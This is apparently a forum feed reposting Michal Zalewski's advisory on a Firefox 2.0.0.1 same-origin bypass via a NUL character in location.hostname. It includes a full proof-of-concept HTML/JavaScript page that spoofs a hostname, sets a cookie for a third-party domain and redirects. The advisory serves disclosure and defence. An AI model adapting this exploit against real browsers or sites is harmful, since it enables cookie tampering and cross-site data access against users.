<![CDATA[Latest posts for the topic "Firefox Same-Domain Bypass Vulnerability (NULL Character)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Firefox Same-Domain Bypass Vulnerability (NULL Character) Firefox Same-Domain Bypass Vulnerability (NULL Character) SUMMARY A vulnerability in the way Firefox handles writes to the 'location.hostname' DOM property allows a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00. DETAILS There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1, but quite certainly affecting all recent versions. The problem lies in how Firefox handles writes to the 'location.hostname' DOM property. It is possible for a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00. Doing this prompts a peculiar behavior: internally, DOM string variables are not NUL-terminated, and as such, most of checks will consider 'evil.com\x00foo.example.com' to be a part of *.example.com domain. The DNS resolver, however, and much of the remaining browser code, operates on ASCIZ strings native to C/C++ instead, treating the aforementioned example as 'evil.com'. This makes it possible for evil.com to modify location.hostname as described above, and have the resulting HTTP request still sent to evil.com. Once the new page is loaded, the attacker will be able to set cookies for *.example.com; he'll be also able to alter document.domain accordingly, in order to bypass the same-origin policy for XMLHttpRequest and cross-frame / cross-window data access. A quick demonstration is available here: http://lcamtuf.dione.cc/ffhostname.html Code:
<html>
<head>
<title>Firefox location.hostname vulnerability demo 
(lcamtuf@coredump.cx)</title>
</head>

<body style="width: 700px" onload="do_evil(1)">

<script>

function do_evil(onload) {
  if (!onload) {
    try { location.hostname='lcamtuf.dione.cc\x00www.coredump.cx'; }
      catch (err) { alert('Failed to modify location.hostname - probably 
not vulnerable.'); }
  } else if (location.hostname != 'lcamtuf.dione.cc') {
    document.cookie = 'testcookie=1234; domain=.coredump.cx; path=/';
    window.location = 'http://lcamtuf.coredump.cx/ffhostname.cgi';
  }

}

</script>

<font face="arial" size="+0">
<font size="+1" color="purple"><b>Firefox location.hostname vulnerability 
demo</b></font>
<hr size="1">
<p>
This page tests for a serious security vulnerability in Firefox 2.0.0.1 
(and
prior). The vulnerability allows malicious websites to manipulate 
authentication
cookies for third-party sites, and possibly issue <tt>XMLHttpRequests</tt> 
to these
locations, or interact with someone else's frames and windows.
<p>
The test will attempt to impersonate a different site, 
<tt>coredump.cx</tt>,
then set a test cookie for that domain. You will be then taken to that 
other site
to verify the outcome.
<p>
<b>Note that Javascript is required for the exploit to work.</b>
<p>
<input type=button onclick="do_evil(0)" value="Click here to begin test">
<p>
Comments and questions: <a href="mailto:lcamtuf@coredump.cx">Michal 
Zalewski <lcamtuf@coredump.cx></a>
</body>
</html>
If you want to confirm a successful exploitation, check Tools -> Options -> Privacy -> Show Cookies... for coredump.cx after the test; for the demo to succeed, the browser needs to have Javascript enabled, and must accept session cookies. Impact: The impact is quite severe: malicious sites can manipulate authentication cookies for third-party webpages, and, by the virtue of bypassing same-origin policy, can possibly tamper with the way these sites are displayed or how they work. ADDITIONAL INFORMATION The information has been provided by <mailto:lcamtuf@dione.ids.pl> Michal Zalewski. The original article can be found at: http://lcamtuf.coredump.cx/]]>
/hvaonline/posts/list/7183.html#41773 /hvaonline/posts/list/7183.html#41773 GMT
Firefox Same-Domain Bypass Vulnerability (NULL Character) /hvaonline/posts/list/7183.html#41885 /hvaonline/posts/list/7183.html#41885 GMT